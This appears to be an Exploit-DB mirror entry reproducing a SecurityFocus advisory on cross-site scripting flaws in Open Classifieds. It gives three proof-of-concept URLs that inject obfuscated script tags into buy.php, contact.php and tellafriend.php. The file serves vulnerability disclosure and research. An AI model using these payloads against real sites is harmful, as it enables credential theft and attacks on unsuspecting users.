exploit-db-mirror/platforms/php/webapps/34655.txt
Offensive Security d1f84651f9 Updated 09_17_2014
2014-09-17 04:44:23 +00:00

9 lines
719 B
Text
Executable file

source: http://www.securityfocus.com/bid/43335/info
Open Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/buy.php/?page=1>'><ScRiPt %0A%0D>alert(317235523215)%3B</ScRiPt>
http://www.example.com/contact.php?id=1<ScRiPt %0A%0D>alert(345135841734)%3B</ScRiPt>
http://www.example.com/tellafriend.php?id=1>"><ScRiPt %0A%0D>alert(366396570535)%3B</ScRiPt>